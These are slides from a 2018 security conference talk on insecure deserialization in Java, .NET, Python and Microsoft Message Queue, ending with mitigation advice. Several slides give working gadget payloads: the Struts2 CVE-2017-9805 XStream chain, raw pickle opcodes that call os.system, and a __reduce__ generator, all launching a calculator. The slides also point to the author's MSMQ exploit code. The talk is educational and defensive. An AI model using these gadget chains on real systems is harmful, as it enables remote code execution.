Presented by Dor Tumarkin, Application Security Researcher and Team Leader at Checkmarx Take the plunge into deserialization attacks - from understanding the fundamentals of serialization to vulnerability breakdown, through RCE demos in various technologies (Java, C#, Python). Includes research and exploit demo of never-before-seen vulnerabilities in Microsoft’s Message Queue. Originally presented at BSidesLV 2018 and AppSecIL 2018. Slides have been altered to remove animations.

1. (DE)SERIAL KILLERS
Dor Tumarkin

2. Intro to Serialization/Deserialization
Overview
In Code
Real-Life Scenarios
Languages, Frameworks, Exploitation
Java
.NET
Python
PHP?
Go?
Built-in Deserialization Attacks
Conclusions
Best Practices and Mitigation Basics
AGENDA

3. You’ll probably enjoy this most if you have:
Some familiarity with code
Fundamental exploitation
Chill regarding over-simplifications
The ability to GO FAST, because we gonna
ASSUMPTIONS

4. AppSec Researcher TL @ Checkmarx (2 yrs)
Formerly a Senior Consultant @ Cisco’s
COE – RT, PT (2.5 yrs)
7 years actively poking s*it until it
explodes
Father of one epic girl and one shaggy
doggo
Verbose AF
Opinions (and naughty words) are my own
and do not reflect my employer’s, obviously
ABOUT ME
DorTumarkin
Dor.Tumarkin@Checkmarx.com

5. "Serialization is the process of translating data
structures or object state into a format that
can be stored or transmitted and
reconstructed later."
- Wikipedia

6. INTRO TO SERIALIZATION
Can be divided into 3 types of serialization formats
Language native – specific for a language

7. INTRO TO SERIALIZATION
Can be divided into 3 types of serialization formats
Language Native – specific for a language
Generic – CSV, JSON, YAML, XML

8. INTRO TO SERIALIZATION
Can be divided into 3 types of serialization formats
Language Native – specific for a language
Generic – CSV, JSON, YAML, XML
Specialized – Protobuf, MessagePack, CBOR (Out of scope)

9. INTRO TO DESERIALIZATION
The serialized object can then be transmitted over a
network, stored in a file, written to a DB
Most standard serializers will work with all native
serializable data structures, which can, themselves,
often reference almost any class.

10. INTRO TO DESERIALIZATION
It’s kind of like making Soup in a Cup
You take a bowl of soup
And you dehydrate it into a powder
Checkmarx is not sponsored by any soup vendors
All rights belong to their respective owners

11. INTRO TO DESERIALIZATION
The powdered soup can then be stored, or
distributed
Want soup? Just add water!

12. DESERIALIZATION IN CODE
A basic example of Deserialization
in Java, using XStream, a very
popular XML serializer:
1. int id = 1;
2. String name = "John Doe";
3. String address = "1 Elm St.";
4. String[] items = new String[] {"Alarm Clock", "Baseball Bat"} ;
5. ATestingClass testingObj = new ATestingClass(id, name, address, items);
6. XStream xstream = new XStream();
7. System.out.println(xstream.toXML(testingObj));

13. DESERIALIZATION IN CODE
The console output is:
<ATestingClass>
<id>1</id>
<name>John Doe</name>
<address>1 Elm St.</address>
<items>
<string>Alarm Clock</string>
<string>Baseball Bat</string>
</items>
</ATestingClass>
This format can be easily transmitted, stored, etc.

14. DESERIALIZATION IN CODE
This object can then be reconstructed from the XML
XStream produced earlier:
1 ATestingClass newATestingClass =
2 (ATestingClass)xstream.fromXML(serializedATestingClass);
3
4 System.out.println(newATestingClass.getName());
Which would produces the following output:
John Doe

15. DESERIALIZATION CAVEATS
The most significant thing to
consider here is that a class must
be identical in types between
both source (serialized) and
destination (deserialized) –
otherwise, errors may occur

16. REAL WORLD USE CASES
APIs – for example, Struts2 Rest API
uses deserialization to convert XMLs to
objects
Saving current application state to a
file/DB

17. REAL WORLD USE CASES
Server-to-Server distributed workload -
e.g Pickling in Python is often
used to distribute workload
across processes and systems
Many more!

18. ISN’T SERIALIZATION
AMAZING??
Wait a minute...
Rewind a Bit

19. REAL WORLD USE CASES
Server-to-Server distributed workload -
e.g Pickling in Python is often
used to distribute workload
across processes and systems
Many more!

20. The serialized object can then be transmitted over a
network, stored in a file, written to a DB
Most standard serializers will work with all native
serializable data structures, which can, themselves,
often reference
INTRO TO DESERIALIZATION
almost any class.

21. LANGUAGES,
FRAMEWORKS,
EXPLOITATION

22. ACKNOWLEDGEMEN
TS
• Marshalling Pickles
• ysoserial
Chris Frohoff
• Friday the 13th JSON Attacks
• ysoserial.netObjectDataProvider
Oleksandr Mirosh
Alvaro Munoz
• Are You My Type? Breaking .NET Through
Serialization
• ysoserial.netTypeConfuseDelegate
James Forshaw
• Disclosing CVE-2017-9805 & Exploit Gadget Man Yue Mo

23. DESERIALIZATION EXPLOITATION DEMO

24. DESERIALIZATION EXPLOITATION DEMO

25. DESERIALIZATION EXPLOITATION DEMO
Struts2 CVE-2017-9805 REST-API-SHOWCASE Demo

26. DESERIALIZATION EXPLOITATION DEMO
Struts 2
Server
Struts 2
REST API

27. DESERIALIZATION EXPLOITATION DEMO

28. ProcessBuilder.start(“cmd”, “/c calc”)
DESERIALIZATION EXPLOITATION DEMO

29. EXPLOITATION – GO GO GADGET!
This is an example of an
Apache Commons based
gadget chain (more later)
Commons is very popular
Part of Struts2 already
Very difficult to detect with
heuristics
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value
class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource
class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator" />
<next class="java.lang.ProcessBuilder">
<command>
<string>cmd</string>
<string>/c</string>
<string>calc</string>

30. DESERIALIZATION EXPLOITATION DEMO
Let’s Check
the Server

31. DESERIALIZATION EXPLOITATION
What just happened…?
The naïve deserializer inside Struts2’s Rest
API (which is, again, XStream) does not
restrict which classes that can be
deserialized by XStream!
And calls the default XStream constructor:

32. DESERIALIZATION EXPLOITATION
This has since been fixed:
plugins/rest/src/main/java/org/apache/struts2/rest/handler/AllowedClassNames.java

33. EXPLOITATION – GO GO GADGET!
Gadget Chains are a nickname for
nested, serialized objects
Chains what deserialization does:
Sets instance variables
Instance methods are
automatically invoked

34. Init HashMap
Attack Payload
EXPLOITATION – STRUTS2 GADGET CALL FLOW
Key
.hashCode()
NativeString
.getStringValue()
CharSequence
.toString()
Base64Data
.toString()
Base64Data
.get()
(CipherInput
Stream)
InputStream
.read()
Cipher
.Update()
Cipher
.chooseFirst
Provider()
Iterative calls
to
Iterator.next()
new ProcessBuilder()
ProcessBuilder.start()

35. EXPLOITATION – GO GO GADGET!
They can become extremely difficult to design
Must live off the land - use available classes
Must parse
However- don’t always have to complete
deserialization

36. DESERIALIZATION EXPLOITATION DEMO

37. Consider the following code:
And the following object (in the same namespace as Order):
.NET GADGETS

38. .NET GADGETS
Working as intended!

39. .NET GADGETS
Cool.
But what would JsonConvert.DeserializeObject() do with
this guy?
ysoserial.net/ObjectDataProvider

40. DESERIALIZATION EXPLOITATION DEMO
(Order)JsonConvert.DeserializeObject()
Press Enter to
Parse Evil JSON

41. .NET GADGETS
“Safe” deserialization is possible:
Bad

42. .NET GADGETS
“Safe” deserialization is possible:
Implementation uses the generic notation as the
expected Type, and fails on time
Without it, anything gets deserialized
There are ways to have multiple types, of course
The bigger issue is – usage is vague
Good

43. .NET GADGETS
What exception was thrown?
Since casting was of the wrong object, an
exception occurred
TOO LATE

44. UNTYPED DESERIALIZATION EXPLOITATION DEMO
Python Pickle Demo

45. UNTYPED DESERIALIZATION EXPLOITATION DEMO
(i__main__
Trade
p0
(dp1
S'userID'
p2
S'12345'
p3
sS'broker'
p4
S'John Doe'
p5
sb.
Consider the following Python code:

46. UNTYPED DESERIALIZATION EXPLOITATION DEMO
Trade object
deserialized; broker
name is:John Doe
Next, consider deserialization:

47. DESERIALIZATION IN PYTHON
Strictly typed languages would
have an easier time at looking
ahead at classes during
construction
Untyped languages, on the other
hand…

48. DESERIALIZATION IN PYTHON
cposix
system
p1
((lp2
S'gnome-calculator'
p3
atRp4
.
cnt
system
p1
((lp2
S'calc.exe'
p3
atRp4
.
Windows Sample Linux Sample

49. UNTYPED DESERIALIZATION EXPLOITATION DEMO
Unpickling
Code
Press Enter to
pickle.loads()

50. DESERIALIZATION IN PYTHON
Generating a Python gadget for pickles is simple:
__reduce__ provides the Pickle-able form of a method and
args tuple
Basically spring-loaded code injection bombs
class RunCalc(object):
def __reduce__(self):
return (os.system, (["calc.exe"],))
print pickle.dumps(RunGnomeCalc())

51. DESERIALIZATION IN UNTYPED LANGUAGES
PHP built-in deserialization is
very… specific?
Deserialization only triggers
specific magic methods
(__wakeup, __destruct)
Sets members without
constructor

52. DESERIALIZATION IN UNTYPED LANGUAGES
PHP’s own limitationsdesign saves it:
Built-in methods are actually “language
constructs”
Not part of any class
Essentially “white-lists” to custom classes
Can still be exploited under certain
conditions for many things, including RCE
…contextually, more-so than Java/.NET

53. POP QUIZ
How would deserialization in Go look like?
More or less complicated to exploit?

54. ROOT CAUSE
At this point some common threads are
very noticeable:
Deserialization streamlines object
construction from string/bytes
Dangerous IFF you naïvely deserialize
tainted inputs! Never trust those!
Remote naïve deserialization is super
dangerous, tons of RCE samples

55. ROOT CAUSE
But in many cases deserialization is
only local or trusted
And there are alternatives in APIs
Not like there are whole technologies
designed to distribute objects via
serialization, right?

56. EXPLOITING
DISTRIBUTED
SYSTEMS WITH BUILT-
IN DESERIALIZATION

57. MESSAGE QUEUES
AND
DESERIALIZATION

58. MESSAGE QUEUES
Message Queues literally distribute
messages via a queue
Agnostic MQs just send strings or bytes
(Rabbit, Kafka), which can be wrapped
with senders and receivers

59. DESERIALIZATION IN MESSAGE QUEUES
But some allow sending objects!
End-to-End:
Serialize
Publish
Subscribe
Deserialize
So… are end-to-end object MQs
basically an RCE delivery system?

60. DESERIALIZATION IN MESSAGE QUEUES
Java’s JMS is well documented as vulnerable
Many Java samples available
“Pwning Your Java Messaging” – BH2016, by Matthias Kaiser
public void onMessage(Message message) {
try {
ObjectMessage objectMessage = (ObjectMessage) message;
objectMessage.getObject(); //BOOM

61. DESERIALIZATION IN MESSAGE QUEUES
Begs the question - what about
.NET?
It has Microsoft Message Queue!
(MSMQ)
Ancient
Still in use though :D

62. DESERIALIZATION IN MESSAGE QUEUES
MSMQ Server is a
Windows Feature
Uses two object
serialization formatters:
XML
Binary

63. DESERIALIZATION IN MESSAGE QUEUES
Embarked on some Research™!
The only reference we found to these
formatters in a security context was:

64. DESERIALIZATION IN MESSAGE QUEUES

65. DESERIALIZATION IN MESSAGE QUEUES

66. MSMQ DEMO
MSMQ MSDN
Sample
https://msdn.microsoft.com/en-
us/library/system.messaging.binary
messageformatter(v=vs.110).aspx

67. MSMQ DEMO
Ripped from ysoserial.net/TypeConfuseDelegateGenerator.cs

68. MSMQ EXPLOITATION DEMO
Basic MSMQ
Send & Receive

69. MSMQ EXPLOITATION DEMO
Malicious Message Sent
Press Enter to Receive…

70. DESERIALIZATION IN MESSAGE QUEUES
MSDN samples being dangerous isn’t
great
But is this enough? Is there
something a little more official?
Maybe it’s just bad because of
brevity?

71. MSMQ EXPLOITATION DEMO
MSMQ LargeMessageQueue Microsoft Sample Exploit Demo
https://github.com/Microsoft/Windows-classic-samples/tree/master/Samples/Win7Samples
/netds/messagequeuing/LargeMessageQueue

72. MSMQ EXPLOITATION DEMO
Sample Microsoft application for sending and receiving binary

73. MSMQ DEMO
Ripped from ysoserial.net/TypeConfuseDelegateGenerator.cs

74. MSMQ EXPLOITATION DEMO
And Now to Receive…

75. MSMQ EXPLOITATION DEMO
BinaryMessageFormatter is set:
And as soon as you step over .Body…

76. MSMQ EXPLOITATION DEMO
Exploit utilizes ysoserial.netTypeConfuseDelegate gadget
as message body to attack .NET 4
https://github.com/Dor-Tumarkin/MSMQ-
BinaryMessageFormatter-Exploit-for-.NET-4.5
Also successfully modified the
ysoserial.netActivitySurrogateSelector gadget to work
with original target version, .NET 3.5
https://github.com/Dor-Tumarkin/MSMQ-
BinaryMessageFormatter-Exploit-for-.NET-3.5

77. DESERIALIZATION IN MSMQ
MSMQ with
BinaryMessageFormatter
(BMF):
Exploitable by default
Cannot explicitly set types
Intended for remote use

78. DESERIALIZATION IN MSMQ
In what scenarios is
BinaryMessageFormatter used?
Complex objects
Large messages
High-throughput
Not particularly common in open-source,
though
Observed traces in some middleware
implementations
Also in some workload distribution
code

79. DESERIALIZATION IN MSMQ
It is recommended in various
places, such as O’REILLY’s
“C# Cookbook” (2015 4th
Edition)

80. DESERIALIZATION IN MSMQ
Conclusion: DON’T READ BOOKS

81. Anyway, when confronted with a vulnerable sample:
DESERIALIZATION IN MSMQ

82. Anyway, when confronted with a vulnerable sample:
DESERIALIZATION IN MSMQ

83. DESERIALIZATION IN MSMQ
You know who were actually good
sports about it?
O’Reilly!

84. ADDITIONAL RISKS IN
DESERIALIZATION
84

85. DESERIALIZATION – OTHER DANGERS
Deserialization errors will
throw exceptions that may
hurt the flow of the
application.

86. DESERIALIZATION – OTHER DANGERS
In some languages or
implementations, the object is
built from reflection, or with
“default” language constructors
…possibly bypassing any setter
or constructor checks

87. DESERIALIZATION – OTHER DANGERS
In other words – can’t assume
anything about values and logic!

88. AN INDUSTRY
PERSPECTIVE
88

89. DESERIALIZATION – AN
INDUSTRY PERSPECTIVE
Critical vulnerabilities found in:
WebLogic
WebSphere
JBoss
Jenkins
OpenNMS
Struts2
Liferay
Coldfusion
Multiple Cisco products
The list goes on.

90. DESERIALIZATION – AN
INDUSTRY PERSPECTIVE
Part of OWASP Top 10 2017!
A8 – Insecure Deserialization
It’s technically “A1 – Injection”
in 2013, but got its own
category in 2017, particularly
with all that media buzz
(and industry tears)

91. DESERIALIZATION – AN
INDUSTRY PERSPECTIVE
Remote Code Execution
“CVSS 10” Vulnerabilities
Complete CIA obliteration
Overwrite/Corrupt Objects
Exceptions, DoS

92. DESERIALIZATION – AN
INDUSTRY PERSPECTIVE
[Java] Serialization
was a horrible mistake
made in 1997 [1] Oracle is planning on
dropping serialization
support in Java.
This does not matter.
[1]-https://www.infoworld.com/article/3275924/java/oracle-
plans-to-dump-risky-java-serialization.html

93. MITIGATION:
DO`S AND
DO`SN`TS
93

94. WRONG WAYS TO MITIGATE
Catch exception from failed deserialization
Too late, possibly irrelevant, you lose.

95. WRONG WAYS TO MITIGATE
Assert correct type
Obviously too late
You lose again

96. ACTUAL MITIGATIONS
NEVER DESERIALIZE
UNTRUSTED DATA
In Untyped languages
With Untyped deserializers
Or dangerous types!
Choose a white-list
approach

97. ADDITIONAL MITIGATION STEPS
TEST your deserializers, even when
using well defined white-lists
TEST to fail before object creation
TEST if your deserializer goes
through setters and ctors!
If it doesn’t, re-implement logic
in deserialization

98. MITIGATION BY AVERSION
If you’re still paranoid, maybe build
your own data-to-constructor
transformer instead?
Poor performance 
Requires work 
Secure(?) 

99. CONCLUSIONS
Deserialization is kinda awesome
Too awesome?
Classic automagic!
Deserialization can be deadly
Still a lot of potential areas to explore
Never trust a deserializer – always test it

100. QUESTIONS?

101. <java.lang.String>
Thanks!
</java.lang.String>
DorTumarkin
Dor.Tumarkin@Checkmarx.com
github.com/Dor-Tumarkin/